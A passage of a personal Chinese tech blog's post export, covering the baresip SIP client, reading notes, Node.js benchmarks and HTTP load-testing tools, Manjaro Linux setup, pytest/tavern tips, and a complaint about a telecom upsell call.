sourcev4l2_codec Video4Linux2 video codec module (H264 hardware encoding)vidbridge Video bridge modulevidinfo Video info overlay 
modulevidloop Video-loop test modulevp8 VP8 video codecvp9 VP9 video codecvumeter Display audio levels in consolewebrtc_aec Acoustic Echo Cancellation (AEC) using WebRTC SDKwincons Console input driver for Windowswinwave Audio driver for Windowsx11 X11 video output driverx11grab X11 grabber video sourcezrtp ZRTP media encryption module\n参考 https://github.com/baresip/baresip ","permalink":"https://wdd.js.org/opensips/tools/baresip/","summary":"安装 安装前要先安装依赖\nhttps://github.com/baresip/re https://github.com/baresip/rem openssl git clone https://github.com/baresip/baresip cd baresip make sudo make install 指令 /about About box/accept Accept incoming call/answermode Set answer mode/apistate User Agent state/auloop Start audio-loop /auloop_stop Stop audio-loop/auplay Switch audio player/ausrc Switch audio source/callstat Call status/conf_reload Reload config file/config Print configuration/contact_next Set next contact/contact_prev Set previous contact/contacts List contacts/dial .. Dial/dialcontact Dial current contact/hangup Hangup call/help Help menu/insmod Load module/listcalls List active calls/loglevel Log level toggle/main Main loop debug/memstat Memory status/message Message current contact/modules Module debug/netstat Network debug/options Options/play Play audio file/quit Quit/reginfo Registration info/rmmod Unload module/sipstat SIP debug/sysinfo System info/timers Timer debug/uadel Delete User-Agent/uafind Find User-Agent /uanew Create User-Agent/uanext Toggle UAs/uastat UA debug/uuid Print UUID/vidloop Start video-loop /vidloop stop Stop video-loop/vidsrc Switch video source","title":"baresip 非常好用的终端SIP UA"},{"content":"第一讲 关关雎鸠在河洲 ——先秦神话和诗歌标注(黄色) - 位置 129女娲炼石补天处,石破天惊逗秋雨”,第二讲 百家争鸣写春秋 ——先秦散文标注(黄色) - 位置 306为川者决之使导,为民者宣之使言。”标注(黄色) - 位置 466他就发愤努力,一定要做仓库里的老鼠。第三讲 大风起兮云飞扬 ——汉朝的赋和散文标注(黄色) - 位置 538有两个情况可以免死:一是拿出大量的金钱赎身;第二就是受宫刑。标注(黄色) - 位置 539叫《报任安书》:标注(黄色) - 位置 557事情。《史记》写完之后,司马迁就不知所终了。第六讲 独念天地之悠悠 ——隋与初唐文学标注(黄色) - 位置 1346王勃,他在初唐时代是一个非常有才华的少年,他 
27岁就死了。真是“千古文章未尽才”。他写《滕王阁序》,标注(黄色) - 位置 1359就是把你的遭遇拉到跟他相同的地步。譬如说,你考试得了 65分,不高兴,我就对你说:不要难过嘛,我不过只考 67分而已,咱们俩都差不多。第七讲 登高壮观天地间 ——盛唐诗歌标注(黄色) - 位置 1406秦时明月汉时关,万里长征人未还。但使龙城飞将在,不教胡马度阴山。——王昌龄《出塞二首》(其一)标注(黄色) - 位置 1664桃花潭水深千尺,不及汪伦送我情。第八讲 乌衣巷口夕阳斜 ——中唐诗歌标注(黄色) - 位置 1809座中泣下谁最多,江州司马青衫湿。”标注(黄色) - 位置 1892十年磨一剑,霜刃未曾试。第九讲 霜叶红于二月花 ——晚唐诗歌标注(黄色) - 位置 1906停车坐爱枫林晚,霜叶红于二月花。第十讲 大江东去浪淘沙 ——两宋金元文学书签 - 位置 2168标注(黄色) - 位置 2509山盟虽在,锦书难托。标注(黄色) - 位置 2559劝君更尽一杯酒,西出阳关无故人”,标注(黄色) - 位置 2560桃花潭水深千尺,不及汪伦送我情”,\n","permalink":"https://wdd.js.org/posts/2021/06/rml5uy/","summary":"第一讲 关关雎鸠在河洲 ——先秦神话和诗歌标注(黄色) - 位置 129女娲炼石补天处,石破天惊逗秋雨”,第二讲 百家争鸣写春秋 ——先秦散文标注(黄色) - 位置 306为川者决之使导,为民者宣之使言。”标注(黄色) - 位置 466他就发愤努力,一定要做仓库里的老鼠。第三讲 大风起兮云飞扬 ——汉朝的赋和散文标注(黄色) - 位置 538有两个情况可以免死:一是拿出大量的金钱赎身;第二就是受宫刑。标注(黄色) - 位置 539叫《报任安书》:标注(黄色) - 位置 557事情。《史记》写完之后,司马迁就不知所终了。第六讲 独念天地之悠悠 ——隋与初唐文学标注(黄色) - 位置 1346王勃,他在初唐时代是一个非常有才华的少年,他 27岁就死了。真是“千古文章未尽才”。他写《滕王阁序》,标注(黄色) - 位置 1359就是把你的遭遇拉到跟他相同的地步。譬如说,你考试得了 65分,不高兴,我就对你说:不要难过嘛,我不过只考 67分而已,咱们俩都差不多。第七讲 登高壮观天地间 ——盛唐诗歌标注(黄色) - 位置 1406秦时明月汉时关,万里长征人未还。但使龙城飞将在,不教胡马度阴山。——王昌龄《出塞二首》(其一)标注(黄色) - 位置 1664桃花潭水深千尺,不及汪伦送我情。第八讲 乌衣巷口夕阳斜 ——中唐诗歌标注(黄色) - 位置 1809座中泣下谁最多,江州司马青衫湿。”标注(黄色) - 位置 1892十年磨一剑,霜刃未曾试。第九讲 霜叶红于二月花 ——晚唐诗歌标注(黄色) - 位置 1906停车坐爱枫林晚,霜叶红于二月花。第十讲 大江东去浪淘沙 ——两宋金元文学书签 - 位置 2168标注(黄色) - 位置 2509山盟虽在,锦书难托。标注(黄色) - 位置 2559劝君更尽一杯酒,西出阳关无故人”,标注(黄色) - 位置 2560桃花潭水深千尺,不及汪伦送我情”,","title":"一日看尽长安花——听北大教授畅讲中国古代文学"},{"content":"5月书单回顾 《鲁滨逊漂流》记 读完 人在孤独的时候,适合读这本书 《被讨厌的勇气》读到 69%, 很有幸读到这本书,6月继续 《围城》读到21%,我好喜欢钱老的比喻句,总是那么别具一格,让人耳目一新 《一日看尽长安花》读到81%, 我喜欢唐诗宋词,就像是喜欢牛奶一样,非常有营养,又让人回味无穷 《牛津通识读本 数学》读完,如果我能早点读到这本书,我就很可能喜欢上数学。 6月书单 《鳗鱼的旅行》刚读到20% 《Googler软件测试之道》刚读到53%, 牛逼的公司,牛逼的测试 《软件测试之道微软技术专家经验总结》10% 《沉默的病人》1% 《一个人的朝圣》0% 《读懂发票》12% 《108个训练让你成为手机摄影达人》 《经济学通识课》 《楚留香传奇》21% ","permalink":"https://wdd.js.org/posts/2021/06/qpdnp4/","summary":"5月书单回顾 《鲁滨逊漂流》记 读完 人在孤独的时候,适合读这本书 《被讨厌的勇气》读到 69%, 很有幸读到这本书,6月继续 《围城》读到21%,我好喜欢钱老的比喻句,总是那么别具一格,让人耳目一新 《一日看尽长安花》读到81%, 我喜欢唐诗宋词,就像是喜欢牛奶一样,非常有营养,又让人回味无穷 《牛津通识读本 数学》读完,如果我能早点读到这本书,我就很可能喜欢上数学。 6月书单 《鳗鱼的旅行》刚读到20% 
《Googler软件测试之道》刚读到53%, 牛逼的公司,牛逼的测试 《软件测试之道微软技术专家经验总结》10% 《沉默的病人》1% 《一个人的朝圣》0% 《读懂发票》12% 《108个训练让你成为手机摄影达人》 《经济学通识课》 《楚留香传奇》21% ","title":"6月书单"},{"content":"const a = {} function test1 (a) { a = { name: \u0026#39;wdd\u0026#39; } } function test2 () { test1(a) } function test3 () { console.log(a) } test2() test3() ","permalink":"https://wdd.js.org/fe/js-101-question/","summary":"const a = {} function test1 (a) { a = { name: \u0026#39;wdd\u0026#39; } } function test2 () { test1(a) } function test3 () { console.log(a) } test2() test3() ","title":"Js 101 Question"},{"content":"在manjaro上我用的wine版本的微信,然而保存文件时,文件无法保存到manjaro中,而只能保存到wine里面的windows中。\n用wine还是很麻烦的,于是我就选择了网页版本的微信。\n前提 chrome浏览器 操作步骤: 将微信网页版保存为书签\n打开谷歌浏览器的 chrome://apps/ 这个页面\n然后将微信网页版本的的书签拖动到这个页面, 拖动结束后,如下图所示\n在微信的图标上右键,勾选在窗口打开\n然后点击创建快捷方式\n点击创建快捷方式后,会弹出弹窗,显示chrome会在桌面和应用菜单中创建快捷方式,选择创建\n然后你就可以在桌面上看到微信的图标,点击之后chrome会单独创建一个窗口,作为微信的主界面\n使用微信网页版本的好处是\n很方便的访问Linux上的文件 微信通知也正常了 ","permalink":"https://wdd.js.org/posts/2021/06/sxwh8v/","summary":"在manjaro上我用的wine版本的微信,然而保存文件时,文件无法保存到manjaro中,而只能保存到wine里面的windows中。\n用wine还是很麻烦的,于是我就选择了网页版本的微信。\n前提 chrome浏览器 操作步骤: 将微信网页版保存为书签\n打开谷歌浏览器的 chrome://apps/ 这个页面\n然后将微信网页版本的的书签拖动到这个页面, 拖动结束后,如下图所示\n在微信的图标上右键,勾选在窗口打开\n然后点击创建快捷方式\n点击创建快捷方式后,会弹出弹窗,显示chrome会在桌面和应用菜单中创建快捷方式,选择创建\n然后你就可以在桌面上看到微信的图标,点击之后chrome会单独创建一个窗口,作为微信的主界面\n使用微信网页版本的好处是\n很方便的访问Linux上的文件 微信通知也正常了 ","title":"1分钟将微信网页版转为桌面应用"},{"content":"机器信息:4C32G 测试工具:wrk Node: v14.17.0\nexpress.js\n\u0026#39;use strict\u0026#39; const express = require(\u0026#39;express\u0026#39;) const app = express() app.get(\u0026#39;/\u0026#39;, function (req, res) { res.json({ hello: \u0026#39;world\u0026#39; }) }) app.listen(3000) fastify.js\n\u0026#39;use strict\u0026#39; const fastify = require(\u0026#39;fastify\u0026#39;)() fastify.get(\u0026#39;/\u0026#39;, function (req, reply) { reply.send({ hello: \u0026#39;world\u0026#39; }) }) fastify.listen(3000) ~ 测试结果 # express.js Running 10s test @ http://127.0.0.1:3000 12 threads and 400 
connections Thread Stats Avg Stdev Max +/- Stdev Latency 55.36ms 11.53ms 173.22ms 93.16% Req/Sec 602.58 113.03 830.00 84.97% 72034 requests in 10.10s, 17.31MB read Requests/sec: 7134.75 Transfer/sec: 1.71MB # fastify.js Running 10s test @ http://127.0.0.1:3000 12 threads and 400 connections Thread Stats Avg Stdev Max +/- Stdev Latency 16.26ms 5.73ms 105.76ms 96.26% Req/Sec 2.08k 490.82 14.63k 94.92% 249114 requests in 10.09s, 44.43MB read Requests/sec: 24688.94 Transfer/sec: 4.40MB fastify是express的3.4倍, 所以对性能有所追求的话,最好用fastify。\n","permalink":"https://wdd.js.org/fe/perf-test-express-fastify/","summary":"机器信息:4C32G 测试工具:wrk Node: v14.17.0\nexpress.js\n\u0026#39;use strict\u0026#39; const express = require(\u0026#39;express\u0026#39;) const app = express() app.get(\u0026#39;/\u0026#39;, function (req, res) { res.json({ hello: \u0026#39;world\u0026#39; }) }) app.listen(3000) fastify.js\n\u0026#39;use strict\u0026#39; const fastify = require(\u0026#39;fastify\u0026#39;)() fastify.get(\u0026#39;/\u0026#39;, function (req, reply) { reply.send({ hello: \u0026#39;world\u0026#39; }) }) fastify.listen(3000) ~ 测试结果 # express.js Running 10s test @ http://127.0.0.1:3000 12 threads and 400 connections Thread Stats Avg Stdev Max +/- Stdev Latency 55.36ms 11.53ms 173.22ms 93.16% Req/Sec 602.","title":"Perf Test Express Fastify"},{"content":"ab C语言 优点 安装简单 缺点 不支持指定测试时长 安装 # debian/ubuntu apt-get install apache2-utils # centos yum -y install httpd-tools wrk https://github.com/wg/wrk C语言 优点 支持lua脚本 wrk is a modern HTTP benchmarking tool capable of generating significant load when run on a single multi-core CPU. It combines a multithreaded design with scalable event notification systems such as epoll and kqueue. An optional LuaJIT script can perform HTTP request generation, response processing, and custom reporting. 
Details are available in SCRIPTING and several examples are located in scripts/.\n安装 git clone https://github.com/wg/wrk.git cd wrk make sudo ln -s $PWD/wrk /usr/bin/wrk 基本使用 wrk -t12 -c400 -d30s http://127.0.0.1:8080/index.html Running 30s test @ http://127.0.0.1:8080/index.html 12 threads and 400 connections Thread Stats Avg Stdev Max +/- Stdev Latency 635.91us 0.89ms 12.92ms 93.69% Req/Sec 56.20k 8.07k 62.00k 86.54% 22464657 requests in 30.00s, 17.76GB read Requests/sec: 748868.53 Transfer/sec: 606.33MB k6 k6 is a modern load testing tool, building on our years of experience in the load and performance testing industry. It provides a clean, approachable scripting API, local and cloud execution, and flexible configuration.This is how load testing should look in the 21st century.\nhttps://github.com/k6io/k6 go语言开发 优点 支持使用脚本开发测试 功能强大 \u0026hellip;\u0026hellip; 支持将测试结果直接写入influxdb, 这是亮点啊 缺点 如果你只想用几个参数来测试接口,大可不必用k6 安装 # macos brew install k6 // 其他平台也是支持的,参考官方文档 autocannon Javascript/Node.js https://github.com/mcollina/autocannon 优点 如果你是Node.js开发者,安装autocannon是非常简单的 安装 npm i autocannon -g 使用 ali https://github.com/nakabonne/ali go语言开发 特点 支持自动在控制台绘图 安装 brew install nakabonne/ali/ali ","permalink":"https://wdd.js.org/posts/2021/05/fxv15g/","summary":"ab C语言 优点 安装简单 缺点 不支持指定测试时长 安装 # debian/ubuntu apt-get install apache2-utils # centos yum -y install httpd-tools wrk https://github.com/wg/wrk C语言 优点 支持lua脚本 wrk is a modern HTTP benchmarking tool capable of generating significant load when run on a single multi-core CPU. It combines a multithreaded design with scalable event notification systems such as epoll and kqueue. 
An optional LuaJIT script can perform HTTP request generation, response processing, and custom reporting.","title":"5个接口压力测试工具"},{"content":"overview 我主要使用过4个操作系统。windows,macos,ubuntu,manjaro,每个操作系统,我都有上年或者上月的使用体会。\n如果你是普通用户,无论工作还是学习,都不涉及到写代码的话。windows和mac是最好的选择,如果你是一名开发人员,那么macos,ubuntu和manjaro都是可以选择的。\n我是一个很容易接受切换操作系统的人,从每个系统上我都可以很顺畅的切换。但是并不是所有人都是如此,有些人即使用了一年多的mac,还是无法接受,最终又换回了windows。\nchangelog 大学到工作第一年,我一直用windows,满足各种需求 工作第二年,我换了mac。因为我想轻便的笔记本,另外也想尝尝鲜。mac的屏幕、界面UI、触摸板都是值得称道的地方,键盘体验就不尽如人意了。 从mac切换到ubuntu, macbook使用接近4年了。明显感觉到一些性能上的不足,刚好又发现一台空闲的台式机没人用,台式机性能不错,之前是做服务器的,CPU、内存、磁盘资源都比较丰富。然后我就在上面安装了ubuntu。系统的初始化软件安装有些折腾人,要安装中文输入法,常见的软件例如微信和QQ, 安装还是有些难度的。ubuntu刚开始使用还是比较流畅的,但是接下来遇到非常致命的问题,UI经常卡死。查下来发现和Xorg以及系统的显卡有关,网上搜了下,很多人遇到类似的问题,也尝试了一些解决方案,但是还是无法解决。索性我就关了ubuntu的图形界面,仅仅ssh远程开发。 从ubuntu切换到macos, 恢复到之前的状态,感觉很好。但是看到macbook pro上接的扩展坞,以及被各种线缆搞得乱糟糟的桌面,想尝试其他Linux发行版的想法又在心里悄悄发了芽,一路疯长。 难道除了ubuntu, 就没有其他选择了吗?调研一番,发现了manjaro这个发行版,用户评价很不错。然后我就试试看,结果发现安装各种软件比ubuntu方便多了,试用了几天,也是越来越喜欢。又发现了一个宝藏发行版。 其实我一直对manjaro这个单词有很大的好奇,这个英文名是什么意思呢?词典上没有对这个英文词的介绍,只是说是一个linux发行版。 manjaro 什么意思?如何发音? manjaro这个词来自kilimanjaro, 乞力马扎罗是非洲最高的高山,这座山是由于火山爆发所产生的,这个可能比较贴合manjaro的滚动发布的特点,也说明这个发行版是比较活跃的吧。\nAlthough the inspiration for the name originates from Mount Kilimanjaro, it may be pronounced as \u0026lsquo;Man-jar-o\u0026rsquo; or as \u0026lsquo;Man-ha-ro\u0026rsquo;. https://wiki.manjaro.org/index.php/Manjaro_FAQ\n乞力马扎罗山(斯瓦西里语:Kilimanjaro,意为“灿烂发光的山”)位于坦桑尼亚东北的乞力马扎罗区,临近肯尼亚边界,是非洲的最高山,常被称为“非洲屋脊”、“非洲之王”。其最高峰为基博峰(也称乌呼鲁峰),海拔5895米。\nmanjaro发行版的特点 图形化安装界面,非常方便 自带图形界面 自动硬件检测,图形化支持做的比ubuntu好太多 滚动更新 非常多的包,可以使用AUR来安装包 相比于Arch, manjaro对新手非常友好 参考 https://manjaro.org/terms-of-use/ Developed in Austria, France, and Germany, Manjaro provides all the benefits of the Arch operating system combined with a focus on user-friendliness and accessibility. 
https://wiki.manjaro.org/index.php/About_Manjaro\nhttps://wiki.manjaro.org/index.php/Manjaro:A_Different_Kind_of_Beast https://wiki.manjaro.org/index.php/Manjaro_FAQ https://wiki.manjaro.org/index.php/Main_Page https://wiki.manjaro.org/index.php/Using_Manjaro_for_Beginners ","permalink":"https://wdd.js.org/posts/2021/05/cntrwh/","summary":"overview 我主要使用过4个操作系统。windows,macos,ubuntu,manjaro,每个操作系统,我都有上年或者上月的使用体会。\n如果你是普通用户,无论工作还是学习,都不涉及到写代码的话。windows和mac是最好的选择,如果你是一名开发人员,那么macos,ubuntu和manjaro都是可以选择的。\n我是一个很容易接受切换操作系统的人,从每个系统上我都可以很顺畅的切换。但是并不是所有人都是如此,有些人即使用了一年多的mac,还是无法接受,最终又换回了windows。\nchangelog 大学到工作第一年,我一直用windows,满足各种需求 工作第二年,我换了mac。因为我想轻便的笔记本,另外也想尝尝鲜。mac的屏幕、界面UI、触摸板都是值得称道的地方,键盘体验就不尽如人意了。 从mac切换到ubuntu, macbook使用接近4年了。明显感觉到一些性能上的不足,刚好又发现一台空闲的台式机没人用,台式机性能不错,之前是做服务器的,CPU、内存、磁盘资源都比较丰富。然后我就在上面安装了ubuntu。系统的初始化软件安装有些折腾人,要安装中文输入法,常见的软件例如微信和QQ, 安装还是有些难度的。ubuntu刚开始使用还是比较流畅的,但是接下来遇到非常致命的问题,UI经常卡死。查下来发现和Xorg以及系统的显卡有关,网上搜了下,很多人遇到类似的问题,也尝试了一些解决方案,但是还是无法解决。索性我就关了ubuntu的图形界面,仅仅ssh远程开发。 从ubuntu切换到macos, 恢复到之前的状态,感觉很好。但是看到macbook pro上接的扩展坞,以及被各种线缆搞得乱糟糟的桌面,想尝试其他Linux发行版的想法又在心里悄悄发了芽,一路疯长。 难道除了ubuntu, 就没有其他选择了吗?调研一番,发现了manjaro这个发行版,用户评价很不错。然后我就试试看,结果发现安装各种软件比ubuntu方便多了,试用了几天,也是越来越喜欢。又发现了一个宝藏发行版。 其实我一直对manjaro这个单词有很大的好奇,这个英文名是什么意思呢?词典上没有对这个英文词的介绍,只是说是一个linux发行版。 manjaro 什么意思?如何发音? manjaro这个词来自kilimanjaro, 乞力马扎罗是非洲最高的高山,这座山是由于火山爆发所产生的,这个可能比较贴合manjaro的滚动发布的特点,也说明这个发行版是比较活跃的吧。\nAlthough the inspiration for the name originates from Mount Kilimanjaro, it may be pronounced as \u0026lsquo;Man-jar-o\u0026rsquo; or as \u0026lsquo;Man-ha-ro\u0026rsquo;.
https://wiki.manjaro.org/index.php/Manjaro_FAQ\n乞力马扎罗山(斯瓦西里语:Kilimanjaro,意为“灿烂发光的山”)位于坦桑尼亚东北的乞力马扎罗区,临近肯尼亚边界,是非洲的最高山,常被称为“非洲屋脊”、“非洲之王”。其最高峰为基博峰(也称乌呼鲁峰),海拔5895米。\nmanjaro发行版的特点 图形化安装界面,非常方便 自带图形界面 自动硬件检测,图形化支持做的比ubuntu好太多 滚动更新 非常多的包,可以使用AUR来安装包 相比与Arch, manjaro对新手非常友好 参考 https://manjaro.org/terms-of-use/ Developed in Austria, France, and Germany, Manjaro provides all the benefits of the Arch operating system combined with a focus on user-friendliness and accessibility.","title":"又发现了一个宝藏linux发行版 manjaro"},{"content":"获取环境变量 Authorization: \u0026#34;Basic {tavern.env_vars.SECRET_CI_COMMIT_AUTH}\u0026#34; x-www-form-urlencoded request: url: \u0026#34;{test_host}/form_data\u0026#34; method: POST data: id: abc123 按照name过滤运行测试 -k This can then be selected with the -k flag to pytest - e.g. pass pytest-kfake to run all tests with ‘fake’ in the name.\n比如只运行名称包含fake的测试\npy.test -k fake ","permalink":"https://wdd.js.org/posts/2021/05/xneq08/","summary":"获取环境变量 Authorization: \u0026#34;Basic {tavern.env_vars.SECRET_CI_COMMIT_AUTH}\u0026#34; x-www-form-urlencoded request: url: \u0026#34;{test_host}/form_data\u0026#34; method: POST data: id: abc123 按照name过滤运行测试 -k This can then be selected with the -k flag to pytest - e.g. 
pass pytest-kfake to run all tests with ‘fake’ in the name.\n比如只运行名称包含fake的测试\npy.test -k fake ","title":"tavern"},{"content":"大写锁定键一般都是非常鸡肋的功能。\n仅仅一次生效 setxkbmap -option caps:escape 大写锁定键改为esc setxkbmap -option ctrl:nocaps 大写锁定键改为ctrl 永久生效 /etc/X11/xorg.conf.d/90-custom-kbd.conf Section \u0026#34;InputClass\u0026#34; Identifier \u0026#34;keyboard defaults\u0026#34; MatchIsKeyboard \u0026#34;on\u0026#34; Option \u0026#34;XKbOptions\u0026#34; \u0026#34;caps:escape\u0026#34; EndSection 注销或者重启后生效\nhttps://superuser.com/questions/566871/how-to-map-the-caps-lock-key-to-escape-key-in-arch-linuxhttps://wiki.archlinux.org/title/X_keyboard_extension\n","permalink":"https://wdd.js.org/posts/2021/05/eafyk8/","summary":"大写锁定键一般都是非常鸡肋的功能。\n仅仅一次生效 setxkbmap -option caps:escape 大写锁定键改为esc setxkbmap -option ctrl:nocaps 大写锁定键改为ctrl 永久生效 /etc/X11/xorg.conf.d/90-custom-kbd.conf Section \u0026#34;InputClass\u0026#34; Identifier \u0026#34;keyboard defaults\u0026#34; MatchIsKeyboard \u0026#34;on\u0026#34; Option \u0026#34;XKbOptions\u0026#34; \u0026#34;caps:escape\u0026#34; EndSection 注销或者重启后生效\nhttps://superuser.com/questions/566871/how-to-map-the-caps-lock-key-to-escape-key-in-arch-linuxhttps://wiki.archlinux.org/title/X_keyboard_extension","title":"大写锁定键映射为escape"},{"content":"笔记本导出牛津通识读本:数学(中文版)蒂莫西·高尔斯\n第二章 数与抽象标注(黄色) - 位置 483重要的只是它们所遵循的规则。标注(黄色) - 位置 486我们通过接受 i作出小小的投资,结果得到了许多倍的回报。\n","permalink":"https://wdd.js.org/posts/2021/05/wsoivr/","summary":"笔记本导出牛津通识读本:数学(中文版)蒂莫西·高尔斯\n第二章 数与抽象标注(黄色) - 位置 483重要的只是它们所遵循的规则。标注(黄色) - 位置 486我们通过接受 i作出小小的投资,结果得到了许多倍的回报。","title":"牛津通识读本:数学(中文版)笔记"},{"content":"第一章 人生的起点标注(黄色) - 位置 44他对我说,只有那些穷到走投无路,或心怀大志的巨富,才会选择出海冒险,想让自己以非凡的事业扬名于世。\n走投无路的穷人剩下的只是作为动物的本能,怎么可能和心怀大志的巨富相提并论呢\n标注(黄色) - 位置 194在去伦敦的路上,以及到了伦敦以后,我内心一直剧烈挣扎,我到底该选什么样的人生道路,我该回家还是该航海?\n我相信,每个人都有面对人生道路的艰难抉择的时候。\n第三章 荒岛遇难标注(黄色) - 位置 621“因为突来的欣喜,如同突来的悲伤,都令人难以承受。”\n悲伤与快乐都是来自比较。\n第六章 生病以及良心有愧标注(黄色) - 位置 1193大麦刚刚长出来的时候,我曾深受感动,第一次认为那是上帝显示的神迹。不过后来发现那不是神迹以后,所有从它而来的感动就随之消失了。\n无法解释的时候,才会想到鬼神。\n第九章 
小船标注(黄色) - 位置 1701我认为,我们之所以感到缺乏和不满足,是因为我们对已经拥有的东西缺少感恩之心。\n看到苹果又出了新手机,macbook pro又出了新款的m1笔记本,对比我本自己目前手中所拥有的东西,你真的珍惜过吗? 得不到的永远在骚动 \u0026ndash;《红玫瑰》\n第十章 驯养山羊标注(黄色) - 位置 1797我在统治这岛——或者说,被囚禁在这岛——的第六年的十一月六日\n你在获得无尽的自由的时候,也被自由所囚禁。\n第十七章 叛乱者到访标注(黄色) - 位置 3187你知道,”他说,“以色列的百姓一开始获救离开埃及的时候,人人欢欣鼓舞,但是,当他们在旷野里缺乏面包时,他们甚至背叛了拯救他们的\n人性而已\n第十九章 重返英国标注(黄色) - 位置 3714等医生问明了病因之后,他给我放了血,之后我才放松下来,逐渐好转。\n我曾听过放血疗法,没想到还真的在小说中看过。\n标注(黄色) - 位置 3715我相信,如果当时没有用放血来舒缓我激动的情绪,我早就死了。\n第二十章 星期五与熊之战标注(黄色) - 位置 4018那条船上除了一些必需品,我还给他们送了七个女人去。她们是我亲自鉴别的,有的适于干活,有的适于做老婆,只要那边有人愿意娶她们。\n惊讶了,鲁滨逊在那里找到的女人,是奴隶吗?\n标注(黄色) - 位置 4025以及我个人在后续十多年中各种新的冒险和奇遇,我会在我的第二部冒险故事中一一叙述。\n好像没有第二部吧\n","permalink":"https://wdd.js.org/posts/2021/05/uvq06k/","summary":"第一章 人生的起点标注(黄色) - 位置 44他对我说,只有那些穷到走投无路,或心怀大志的巨富,才会选择出海冒险,想让自己以非凡的事业扬名于世。\n走投无路的穷人剩下的只是作为动物的本能,怎么可能和心怀大志的巨富相提并论呢\n标注(黄色) - 位置 194在去伦敦的路上,以及到了伦敦以后,我内心一直剧烈挣扎,我到底该选什么样的人生道路,我该回家还是该航海?\n我相信,每个人都有面对人生道路的艰难抉择的时候。\n第三章 荒岛遇难标注(黄色) - 位置 621“因为突来的欣喜,如同突来的悲伤,都令人难以承受。”\n悲伤与快乐都是来自比较。\n第六章 生病以及良心有愧标注(黄色) - 位置 1193大麦刚刚长出来的时候,我曾深受感动,第一次认为那是上帝显示的神迹。不过后来发现那不是神迹以后,所有从它而来的感动就随之消失了。\n无法解释的时候,才会想到鬼神。\n第九章 小船标注(黄色) - 位置 1701我认为,我们之所以感到缺乏和不满足,是因为我们对已经拥有的东西缺少感恩之心。\n看到苹果又出了新手机,macbook pro又出了新款的m1笔记本,对比我本自己目前手中所拥有的东西,你真的珍惜过吗? 
得不到的永远在骚动 \u0026ndash;《红玫瑰》\n第十章 驯养山羊标注(黄色) - 位置 1797我在统治这岛——或者说,被囚禁在这岛——的第六年的十一月六日\n你在获得无尽的自由的时候,也被自由所囚禁。\n第十七章 叛乱者到访标注(黄色) - 位置 3187你知道,”他说,“以色列的百姓一开始获救离开埃及的时候,人人欢欣鼓舞,但是,当他们在旷野里缺乏面包时,他们甚至背叛了拯救他们的\n人性而已\n第十九章 重返英国标注(黄色) - 位置 3714等医生问明了病因之后,他给我放了血,之后我才放松下来,逐渐好转。\n我曾听过放血疗法,没想到还真的在小说中看过。\n标注(黄色) - 位置 3715我相信,如果当时没有用放血来舒缓我激动的情绪,我早就死了。\n第二十章 星期五与熊之战标注(黄色) - 位置 4018那条船上除了一些必需品,我还给他们送了七个女人去。她们是我亲自鉴别的,有的适于干活,有的适于做老婆,只要那边有人愿意娶她们。\n惊讶了,鲁滨逊在那里找到的女人,是奴隶吗?\n标注(黄色) - 位置 4025以及我个人在后续十多年中各种新的冒险和奇遇,我会在我的第二部冒险故事中一一叙述。\n好像没有第二部吧","title":"鲁滨逊漂流记 笔记与读后感"},{"content":"环境: ARM64\n\u0026lt;--- Last few GCs ---\u0026gt; \u0026lt;--- JS stacktrace ---\u0026gt; # # Fatal process OOM in insufficient memory to create an Isolate # 在Dockerfile上设置max-old-space-size的node.js启动参数, 亲测有效。\nCMD node --report-on-fatalerror --max-old-space-size=1536 dist/index.js Currently, by default v8 has a memory limit of 512mb on 32-bit and 1gb on 64-bit systems. You can raise the limit by setting \u0026ndash;max-old-space-size to a maximum of ~1gb for 32-bit and ~1.7gb for 64-bit systems. But it is recommended to split your single process into several workers if you are hitting memory limits.\n参考 https://nodejs.org/api/cli.html#cli_max_old_space_size_size_in_megabytes https://stackoverflow.com/questions/54919258/ng-commands-throws-insufficient-memory-error-fatal-process-oom-in-insufficient https://medium.com/@vuongtran/how-to-solve-process-out-of-memory-in-node-js-5f0de8f8464c ","permalink":"https://wdd.js.org/fe/oom-in-insufficient-memory/","summary":"环境: ARM64\n\u0026lt;--- Last few GCs ---\u0026gt; \u0026lt;--- JS stacktrace ---\u0026gt; # # Fatal process OOM in insufficient memory to create an Isolate # 在Dockerfile上设置max-old-space-size的node.js启动参数, 亲测有效。\nCMD node --report-on-fatalerror --max-old-space-size=1536 dist/index.js Currently, by default v8 has a memory limit of 512mb on 32-bit and 1gb on 64-bit systems. 
You can raise the limit by setting \u0026ndash;max-old-space-size to a maximum of ~1gb for 32-bit and ~1.7gb for 64-bit systems. But it is recommended to split your single process into several workers if you are hitting memory limits.","title":"Fatal process OOM in insufficient memory to create an Isolate"},{"content":"联通官方客服已经开始割韭菜了。\n前两天10010给我打电话,一个女客服操着浓重的口音,兴奋的给说我是优质客户,然后因为回馈老用户的关系,每个月会多送我2个G的5G高速流量。\n我当时很警觉,立马问她这个会对我原来的套餐有影响吗,她说没任何影响,接着殷切的问我要不要办理。我思考了一下,觉得不用花钱,又多了2个G的流量,索性就办理了。\n今天我在联通掌上营业厅上查自己的实时话费,突然多出了一项9元的流量叠加包月套餐费。的确对我原来的套餐没有影响,只是多了一个新的业务。😂\n我思来想去,我应该没有办理这个套餐啊?哪里冒出来的。然后仔细的从迷宫似的掌上营业厅上查找套餐信息。结果给我找到了下面的信息。\n我当时很生气,当时客服给我介绍流量包的时候,从始至终没有提这个流量包要收费的事情。我也是大意了,没有闪。\n接着我就打了10010的官方客服,然后走人工投诉,最终取消了这个套餐。\n我想,这种电话应该很多人都接过吧,被骗的应该不只是少数,如果不仔细看自己的账单,我也不知道有这件事情。\n从这件事事情我也反省自己:\n官方客服也不要信 客服说的话,都要当作放屁 没有看到黑纸白字的承诺,都是骗人的 不要想贪小便宜,否则自己就会被当作韭菜 